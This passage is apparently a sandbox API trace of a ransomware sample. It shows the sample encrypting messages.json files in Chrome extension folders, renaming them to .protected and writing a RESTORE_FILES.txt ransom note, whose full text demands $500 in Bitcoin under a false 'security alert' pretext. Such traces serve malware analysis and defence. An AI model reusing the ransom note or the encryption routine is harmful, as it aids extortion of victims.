HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.protected")) returned 1 [0080.572] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.572] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.572] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\RESTORE_FILES.txt") returned 159 [0080.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.573] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.573] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.573] lstrlenA (lpString="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") returned 684 [0080.573] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.574] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.574] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.574] CloseHandle (hObject=0x164) returned 1 [0080.574] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko") returned 141 [0080.574] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0080.574] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*") returned 143 [0080.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.574] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\.") returned 143 [0080.574] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.574] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.574] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\..") returned 144 [0080.574] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.574] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.574] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") 
returned 155 [0080.575] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.575] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.575] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.575] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.575] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.576] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.576] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.576] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0080.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.576] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0080.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.576] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.577] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.577] CloseHandle (hObject=0x168) returned 1 [0080.577] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.protected") returned 165 [0080.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.protected")) returned 1 [0080.577] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.577] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.577] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0080.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.578] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.578] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.578] lstrlenA (lpString="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") returned 684 [0080.578] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.579] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.579] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.579] CloseHandle (hObject=0x164) returned 1 [0080.579] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="Program Files") returned -1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="Program Files (x86)") returned -1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="$Recycle.bin") returned 1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="System Volume Information") returned -1 [0080.579] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo") returned 141 [0080.579] lstrcmpW (lpString1="lo", lpString2=".") returned 1 [0080.579] lstrcmpW (lpString1="lo", lpString2="..") returned 1 [0080.579] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*") returned 143 [0080.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.579] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.579] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.579] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.579] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.579] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\.") returned 143 [0080.579] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.579] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.579] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.579] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.579] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.579] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.579] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\..") returned 144 [0080.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.579] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.579] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.580] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.580] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.580] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.580] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") 
returned 155 [0080.580] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.580] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.580] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.580] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.580] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x1c2, lpOverlapped=0x0) returned 1 [0080.581] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.581] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x1c2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x1c2, lpOverlapped=0x0) returned 1 [0080.581] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.581] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.581] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.581] CloseHandle (hObject=0x168) returned 1 [0080.582] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.protected") returned 165 [0080.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.protected")) returned 1 [0080.582] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.582] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.582] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\RESTORE_FILES.txt") returned 159 [0080.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: 